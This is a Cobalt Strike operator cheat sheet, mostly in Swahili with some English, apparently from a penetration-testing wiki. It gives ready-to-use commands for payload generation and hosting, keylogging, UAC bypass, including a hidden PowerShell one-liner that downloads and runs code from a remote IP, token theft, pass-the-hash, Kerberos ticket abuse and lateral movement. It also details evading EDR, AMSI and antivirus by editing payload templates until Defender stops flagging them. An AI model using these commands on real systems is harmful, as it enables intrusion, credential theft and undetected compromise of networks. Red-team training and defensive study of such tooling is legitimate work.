Cobalt Strike
Reading time: 14 minutes
Listeners
C2 Listeners
Cobalt Strike -> Listeners -> Add/Edit
kisha unaweza kuchagua wapi kusikiliza, ni aina gani ya beacon ya kutumia (http, dns, smb...) na zaidi.
Peer2Peer Listeners
Beacons za wasikilizaji hawa hazihitaji kuzungumza na C2 moja kwa moja, wanaweza kuwasiliana nayo kupitia beacons nyingine.
Cobalt Strike -> Listeners -> Add/Edit
kisha unahitaji kuchagua TCP au SMB beacons
- Beacon ya TCP itaanzisha msikilizaji katika bandari iliyochaguliwa. Kuungana na beacon ya TCP tumia amri
connect <ip> <port>
kutoka beacon nyingine - Beacon ya smb itasikiliza katika pipename yenye jina lililochaguliwa. Kuungana na beacon ya SMB unahitaji kutumia amri
link [target] [pipe]
.
Generate & Host payloads
Generate payloads in files
Attacks -> Packages ->
HTMLApplication
kwa ajili ya faili za HTAMS Office Macro
kwa hati ya ofisi yenye macroWindows Executable
kwa .exe, .dll au huduma .exeWindows Executable (S)
kwa stageless .exe, .dll au huduma .exe (bora stageless kuliko staged, chini ya IoCs)
Generate & Host payloads
Attacks -> Web Drive-by -> Scripted Web Delivery (S)
Hii itazalisha script/executable ya kupakua beacon kutoka cobalt strike katika fomati kama: bitsadmin, exe, powershell na python
Host Payloads
Ikiwa tayari una faili unayotaka kuhifadhi kwenye seva ya wavuti nenda tu kwa Attacks -> Web Drive-by -> Host File
na uchague faili ya kuhifadhi na usanidi wa seva ya wavuti.
Beacon Options
# Execute local .NET binary
execute-assembly
# Kumbuka kwamba ili kupakia assemblies kubwa zaidi ya 1MB, mali ya 'tasks_max_size' ya profaili ya malleable inahitaji kubadilishwa.
# Screenshots
printscreen # Chukua picha moja kupitia njia ya PrintScr
screenshot # Chukua picha moja
screenwatch # Chukua picha za kawaida za desktop
## Nenda kwa View -> Screenshots kuziangalia
# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes kuangalia funguo zilizopigwa
# portscan
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Ingiza hatua ya portscan ndani ya mchakato mwingine
portscan [targets] [ports] [arp|icmp|none] [max connections]
# Powershell
## Import Powershell module
powershell-import C:\path\to\PowerView.ps1
powershell-import /root/Tools/PowerSploit/Privesc/PowerUp.ps1
powershell # Hii inatumia toleo la juu zaidi la powershell linaloungwa mkono (sio oppsec)
powerpick # Hii inaunda mchakato wa dhabihu ulioainishwa na spawnto, na kuingiza UnmanagedPowerShell ndani yake kwa ajili ya opsec bora (sio logging)
powerpick Invoke-PrivescAudit | fl
psinject # Hii inaingiza UnmanagedPowerShell ndani ya mchakato ulioainishwa ili kuendesha cmdlet ya PowerShell.
# User impersonation
## Token generation with creds
make_token [DOMAIN\user] [password] #Unda token ili kuiga mtumiaji katika mtandao
ls \\computer_name\c$ # Jaribu kutumia token iliyoundwa kufikia C$ katika kompyuta
rev2self # Acha kutumia token iliyoundwa na make_token
## Matumizi ya make_token yanazalisha tukio 4624: Akaunti ilifanikiwa kuingia. Tukio hili ni la kawaida sana katika eneo la Windows, lakini linaweza kupunguzika kwa kuchuja kwa Aina ya Kuingia. Kama ilivyotajwa hapo juu, inatumia LOGON32_LOGON_NEW_CREDENTIALS ambayo ni aina ya 9.
# UAC Bypass
elevate svc-exe
elevate uac-token-duplication
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## Steal token from pid
## Kama make_token lakini kuiba token kutoka kwa mchakato
steal_token [pid] # Pia, hii ni muhimu kwa hatua za mtandao, sio hatua za ndani
## Kutoka kwa hati ya API tunajua kwamba aina hii ya kuingia "inaruhusu mwito kuiga token yake ya sasa". Hii ndiyo sababu matokeo ya Beacon yanasema Imepitishwa - inaimarisha token yetu iliyokopwa.
ls \\computer_name\c$ # Jaribu kutumia token iliyoundwa kufikia C$ katika kompyuta
rev2self # Acha kutumia token kutoka steal_token
## Launch process with nwe credentials
spawnas [domain\username] [password] [listener] #Fanya hivyo kutoka kwenye saraka yenye ruhusa ya kusoma kama: cd C:\
## Kama make_token, hii itazalisha tukio la Windows 4624: Akaunti ilifanikiwa kuingia lakini kwa aina ya kuingia ya 2 (LOGON32_LOGON_INTERACTIVE). Itabainisha mtumiaji anayeita (TargetUserName) na mtumiaji anayepitishwa (TargetOutboundUserName).
## Inject into process
inject [pid] [x64|x86] [listener]
## Kutoka kwa mtazamo wa OpSec: Usifanye kuingiza msalaba wa jukwaa isipokuwa ni lazima (mfano x86 -> x64 au x64 -> x86).
## Pass the hash
## Mchakato huu wa mabadiliko unahitaji kubadilisha kumbukumbu ya LSASS ambayo ni hatua ya hatari kubwa, inahitaji ruhusa za admin za ndani na sio rahisi sana ikiwa Mchakato Uliolindwa Mwanga (PPL) umewezeshwa.
pth [pid] [arch] [DOMAIN\user] [NTLM hash]
pth [DOMAIN\user] [NTLM hash]
## Pass the hash through mimikatz
mimikatz sekurlsa::pth /user: /domain: /ntlm: /run:"powershell -w hidden"
## Bila /run, mimikatz itazalisha cmd.exe, ikiwa unafanya kazi kama mtumiaji mwenye Desktop, ataona shell (ikiwa unafanya kazi kama SYSTEM uko sawa)
steal_token #Iba token kutoka kwa mchakato ulioanzishwa na mimikatz
## Pass the ticket
## Omba tiketi
execute-assembly /root/Tools/SharpCollection/Seatbelt.exe -group=system
execute-assembly C:\path\Rubeus.exe asktgt /user: /domain: /aes256: /nowrap /opsec
## Unda kikao kipya cha kuingia ili kutumia tiketi mpya (ili usifute ile iliyovunjwa)
make_token \ DummyPass
## Andika tiketi kwenye mashine ya mshambuliaji kutoka kwa kikao cha poweshell & ipakue
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
## Pass the ticket from SYSTEM
## Unda mchakato mpya na tiketi
execute-assembly C:\path\Rubeus.exe asktgt /user: /domain: /aes256: /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## Iba token kutoka kwa mchakato huo
steal_token
## Extract ticket + Pass the ticket
### List tickets
execute-assembly C:\path\Rubeus.exe triage
### Dump insteresting ticket by luid
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid: /nowrap
### Create new logon session, note luid and processid
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### Insert ticket in generate logon session
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### Finally, steal the token from that new process
steal_token
# Lateral Movement
## Ikiwa token iliumbwa itatumika
jump [method] [target] [listener]
## Methods:
## psexec x86 Tumia huduma kuendesha kipande cha huduma EXE
## psexec64 x64 Tumia huduma kuendesha kipande cha huduma EXE
## psexec_psh x86 Tumia huduma kuendesha PowerShell one-liner
## winrm x86 Endesha script ya PowerShell kupitia WinRM
## winrm64 x64 Endesha script ya PowerShell kupitia WinRM
## wmi_msbuild x64 wmi lateral movement with msbuild inline c# task (oppsec)
remote-exec [method] [target] [command] # remote-exec doesn't return output
## Methods:
## psexec Remote execute via Service Control Manager
## winrm Remote execute via WinRM (PowerShell)
## wmi Remote execute via WMI
## Ili kuendesha beacon kwa wmi (haipo katika amri ya jump) pakua tu beacon na uendeshe
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
# Pass session to Metasploit - Through listener
## Kwenye mwenyeji wa metaploit
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j
## Kwenye cobalt: Listeners > Ongeza na weka Payload kuwa Foreign HTTP. Weka Host kuwa 10.10.5.120, Bandari kuwa 8080 na bonyeza Hifadhi.
beacon> spawn metasploit
## Unaweza tu kuanzisha vikao vya x86 Meterpreter na msikilizaji wa kigeni.
# Pass session to Metasploit - Through shellcode injection
## Kwenye mwenyeji wa metasploit
msfvenom -p windows/x64/meterpreter_reverse_http LHOST= LPORT= -f raw -o /tmp/msf.bin
## Endesha msfvenom na uandae msikilizaji wa multi/handler
## Nakili faili ya bin kwenye mwenyeji wa cobalt strike
ps
shinject x64 C:\Payloads\msf.bin #Ingiza shellcode ya metasploit katika mchakato wa x64
# Pass metasploit session to cobalt strike
## Fenerate stageless Beacon shellcode, nenda kwa Attacks > Packages > Windows Executable (S), chagua msikilizaji unaotaka, chagua Raw kama aina ya Matokeo na chagua Tumia payload ya x64.
## Tumia post/windows/manage/shellcode_inject katika metasploit kuingiza shellcode iliyozalishwa ya cobalt strike
# Pivoting
## Fungua proxy ya socks katika teamserver
beacon> socks 1080
# SSH connection
beacon> ssh 10.10.17.12:22 username password
Opsec
### Execute-Assembly
execute-assembly
inatumia mchakato wa dhabihu kwa kutumia kuingiza mchakato wa mbali ili kuendesha programu iliyoonyeshwa. Hii ni kelele sana kwani kuingiza ndani ya mchakato APIs fulani za Win zinatumika ambazo kila EDR inakagua. Hata hivyo, kuna zana za kawaida ambazo zinaweza kutumika kupakia kitu katika mchakato sawa:
- https://github.com/anthemtotheego/InlineExecute-Assembly
- https://github.com/kyleavery/inject-assembly
- Katika Cobalt Strike unaweza pia kutumia BOF (Beacon Object Files): https://github.com/CCob/BOF.NET
- https://github.com/kyleavery/inject-assembly
Script ya agressor https://github.com/outflanknl/HelpColor
itaunda amri ya helpx
katika Cobalt Strike ambayo itaweka rangi katika amri ikionyesha ikiwa ni BOFs (kijani), ikiwa ni Frok&Run (njano) na kadhalika, au ikiwa ni ProcessExecution, kuingiza au sawa (nyekundu). Ambayo inasaidia kujua ni amri zipi ziko stealthy zaidi.
Act as the user
Unaweza kuangalia matukio kama Seatbelt.exe LogonEvents ExplicitLogonEvents PoweredOnEvents
:
- Usalama EID 4624 - Angalia kuingia kwa mwingiliano wote ili kujua masaa ya kawaida ya kazi.
- Mfumo EID 12,13 - Angalia mara za kuzima/kuzindua/usingizi.
- Usalama EID 4624/4625 - Angalia majaribio halali/asiye halali ya NTLM.
- Usalama EID 4648 - Tukio hili linaundwa wakati akidi za maandiko zinapotumika kuingia. Ikiwa mchakato umeunda, binary hiyo ina uwezekano wa kuwa na akidi hizo wazi katika faili ya usanidi au ndani ya msimbo.
Unapotumia jump
kutoka cobalt strike, ni bora kutumia njia ya wmi_msbuild
ili kufanya mchakato mpya uonekane halali zaidi.
Use computer accounts
Ni kawaida kwa walinzi kuangalia tabia za ajabu zinazozalishwa na watumiaji na kuondoa akaunti za huduma na akaunti za kompyuta kama *$
kutoka kwa ufuatiliaji wao. Unaweza kutumia akaunti hizi kufanya harakati za pembeni au kupandisha ruhusa.
Use stageless payloads
Payloads zisizo na hatua ni kelele kidogo kuliko zile zilizopangwa kwa sababu hazihitaji kupakua hatua ya pili kutoka kwa seva ya C2. Hii inamaanisha kwamba hazizalishi trafiki yoyote ya mtandao baada ya muunganisho wa awali, na kufanya kuwa na uwezekano mdogo wa kugunduliwa na ulinzi wa mtandao.
Tokens & Token Store
Kuwa makini unapoiba au kuunda token kwa sababu inaweza kuwa inawezekana kwa EDR kuhesabu token zote za nyuzi zote na kupata token inayomilikiwa na mtumiaji tofauti au hata SYSTEM katika mchakato.
Hii inaruhusu kuhifadhi token kwa beacon ili sio lazima kuiba token ile ile tena na tena. Hii ni muhimu kwa harakati za pembeni au unapohitaji kutumia token iliyopatikana mara nyingi:
- token-store steal
- token-store steal-and-use
- token-store show
- token-store use
- token-store remove
- token-store remove-all
Unapohamisha pembeni, kawaida ni bora kuiba token kuliko kuunda mpya au kufanya shambulio la kupitisha hash.
Guardrails
Cobalt Strike ina kipengele kinachoitwa Guardrails ambacho husaidia kuzuia matumizi ya amri au hatua fulani ambazo zinaweza kugunduliwa na walinzi. Guardrails zinaweza kuundwa kuzuia amri maalum, kama vile make_token
, jump
, remote-exec
, na nyinginezo ambazo hutumiwa mara kwa mara kwa harakati za pembeni au kupandisha ruhusa.
Zaidi ya hayo, repo https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks pia ina baadhi ya ukaguzi na mawazo ambayo unaweza kuzingatia kabla ya kutekeleza payload.
Tickets encryption
Katika AD kuwa makini na usimbaji wa tiketi. Kawaida, zana fulani zitatumia usimbaji wa RC4 kwa tiketi za Kerberos, ambayo ni salama kidogo kuliko usimbaji wa AES na kwa kawaida mazingira ya kisasa yatatumia AES. Hii inaweza kugunduliwa na walinzi wanaofuatilia algorithimu dhaifu za usimbaji.
Avoid Defaults
Unapotumia Cobalt Strike kwa kawaida mabomba ya SMB yatakuwa na jina msagent_####
na "status_####
. Badilisha majina hayo. Inawezekana kuangalia majina ya mabomba yaliyopo kutoka Cobalt Strike kwa amri: ls \\.\pipe\
Zaidi ya hayo, na vikao vya SSH bomba linaloitwa \\.\pipe\postex_ssh_####
linaanzishwa. Badilisha kwa set ssh_pipename "<new_name>";
.
Pia katika shambulio la baada ya unyakuzi mabomba \\.\pipe\postex_####
yanaweza kubadilishwa kwa set pipename "<new_name>"
.
Katika profaili za Cobalt Strike unaweza pia kubadilisha mambo kama:
- Kuepuka kutumia
rwx
- Jinsi tabia ya kuingiza mchakato inavyofanya kazi (ni APIs zipi zitakazotumika) katika block ya
process-inject {...}
- Jinsi "fork and run" inavyofanya kazi katika block ya
post-ex {…}
- Wakati wa kulala
- Ukubwa wa juu wa binaries zinazoweza kupakiwa kwenye kumbukumbu
- Alama ya kumbukumbu na maudhui ya DLL na block ya
stage {...}
- Trafiki ya mtandao
Bypass memory scanning
Baadhi ya EDRs zinakagua kumbukumbu kwa baadhi ya saini za malware zinazojulikana. Coblat Strike inaruhusu kubadilisha kazi ya sleep_mask
kama BOF ambayo itakuwa na uwezo wa kusimbua katika kumbukumbu backdoor.
Noisy proc injections
Wakati wa kuingiza msimbo katika mchakato hii kwa kawaida ni kelele sana, hii ni kwa sababu hakuna mchakato wa kawaida unafanya hatua hii na kwa sababu njia za kufanya hivyo ni chache sana. Hivyo, inaweza kugunduliwa na mifumo ya kugundua inayotegemea tabia. Aidha, inaweza pia kugunduliwa na EDRs zinazoskania mtandao kwa nyuzi zinazohusisha msimbo ambao haupo kwenye diski (ingawa michakato kama vivinjari vinavyotumia JIT vina hii kawaida). Mfano: https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
Spawnas | PID and PPID relationships
Unapozalisha mchakato mpya ni muhimu kuhifadhi uhusiano wa kawaida wa mzazi-na-mwana kati ya michakato ili kuepuka kugunduliwa. Ikiwa svchost.exec inatekeleza iexplorer.exe itakuwa na shaka, kwani svchost.exe si mzazi wa iexplorer.exe katika mazingira ya kawaida ya Windows.
Wakati beacon mpya inazalishwa katika Cobalt Strike kwa kawaida mchakato unaotumia rundll32.exe
unaundwa ili kuendesha msikilizaji mpya. Hii si stealthy sana na inaweza kugunduliwa kwa urahisi na EDRs. Zaidi ya hayo, rundll32.exe
inatekelezwa bila args yoyote ikifanya kuwa na shaka zaidi.
Kwa amri ifuatayo ya Cobalt Strike, unaweza kuainisha mchakato tofauti ili kuanzisha beacon mpya, na kuifanya iwe ngumu kugundua:
spawnto x86 svchost.exe
You can aso change this setting spawnto_x86
and spawnto_x64
in a profile.
Proxying attackers traffic
Wakati mwingine washambuliaji watahitaji kuwa na uwezo wa kuendesha zana kwa ndani, hata kwenye mashine za linux na kufanya trafiki ya waathirika ifikie zana (e.g. NTLM relay).
Zaidi ya hayo, wakati mwingine kufanya shambulio la pass-the-hash au pass-the-ticket ni rahisi zaidi kwa mshambuliaji kuongeza hash hii au tiketi katika mchakato wake wa LSASS kwa ndani na kisha pivot kutoka kwake badala ya kubadilisha mchakato wa LSASS wa mashine ya mwathirika.
Hata hivyo, unahitaji kuwa makini na trafiki inayozalishwa, kwani unaweza kuwa unatumia trafiki isiyo ya kawaida (kerberos?) kutoka kwa mchakato wako wa backdoor. Kwa hili unaweza pivot kwa mchakato wa kivinjari (ingawa unaweza kukamatwa ukiingiza mwenyewe katika mchakato hivyo fikiria njia ya siri ya kufanya hivi).
### Avoiding AVs
#### AV/AMSI/ETW Bypass
Check the page:
<a class="content_ref" href="av-bypass.md"><span class="content_ref_label">Antivirus (AV) Bypass</span></a>
#### Artifact Kit
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
#### Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
#### Function hooks | Syscall
Function hooking is a very common method of ERDs to detect malicious activity. Cobalt Strike allows you to bypass these hooks by using **syscalls** instead of the standard Windows API calls using the **`None`** config, or use the `Nt*` version of a function with the **`Direct`** setting, or just jumping over the `Nt*` function with the **`Indirect`** option in the malleable profile. Depending on the system, an optino might be more stealth then the other.
This can be set in the profile or suing the command **`syscall-method`**
However, this could also be noisy.
Some option granted by Cobalt Strike to bypass function hooks is to remove those hooks with: [**unhook-bof**](https://github.com/Cobalt-Strike/unhook-bof).
You could also check with functions are hooked with [**https://github.com/Mr-Un1k0d3r/EDRs**](https://github.com/Mr-Un1k0d3r/EDRs) or [**https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector**](https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector)
cd C:\Tools\neo4j\bin
neo4j.bat console
http://localhost:7474/ --> Badilisha nenosiri
execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d DOMAIN.LOCAL
Badilisha powershell
C:\Tools\cobaltstrike\ResourceKit
template.x64.ps1
Badilisha $var_code -> $polop
$x --> $ar
cobalt strike --> script manager --> Load --> Cargar C:\Tools\cobaltstrike\ResourceKit\resources.cna
#artifact kit
cd C:\Tools\cobaltstrike\ArtifactKit
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .